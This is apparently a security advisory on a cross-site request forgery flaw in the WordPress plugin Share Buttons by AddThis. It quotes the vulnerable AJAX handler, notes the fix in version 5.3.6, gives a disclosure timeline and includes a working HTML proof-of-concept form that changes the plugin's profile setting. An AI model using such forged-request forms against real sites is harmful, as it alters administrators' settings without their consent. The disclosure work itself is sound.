19 Jul

Cross-Site Request Forgery (CSRF)/Settings Change Vulnerability in Share Buttons by AddThis

We recently found that the plugin Share Buttons by AddThis had a cross-site request forgery (CSRF)/settings change vulnerability. When setting the plugin’s settings by clicking the Save Options button on the plugin’s settings page proper protection against CSRF exist, but it doesn’t for an alternate method when the plugin is set be controlled from “AddThis.com”.

When it is controlled that way the addthisAsyncLoading function is accessible through WordPress’ AJAX functionality (in the file /addthis-for-wordpress.php):

64
add_action( 'wp_ajax_at_async_loading', array($this, 'addthisAsyncLoading'));

That function checks to make sure the request is coming from some with “manage_options” capability (which is normally only Administrators), but doesn’t check for a valid nonce to prevent CSRF before updating the plugin’s settings:

612
613
614
615
public function addthisAsyncLoading()
{
	if (current_user_can( 'manage_options' ) && $this->_checkAsyncLoading()) {
		$updateResult = $this->updateSettings($this->_postVariables);

After we notified the developer of the issue they resolved it in version 5.3.6 by removing the code shown above from the plugin.

Proof of Concept

The following proof of concept will cause the AddThis Profile ID setting to be changed to “test”, when submitted as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="at_async_loading" />
<input type="hidden" name="async_loading" />
<input type="hidden" name="addthis_settings[addthis_profile]" value='test' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • June 26, 2017 – Developer notified.
  • June 26, 2017 – Developer responds.
  • July 13, 2017 – Version 5.3.6 released, which fixes vulnerability.

Concerned About The Security of The Plugins You Use?

When you are a paying customer of our service (you can currently try the service free for the first month), you get to suggest/vote on what plugins we will do security reviews of.

Leave a Reply

Your email address will not be published. Required fields are marked *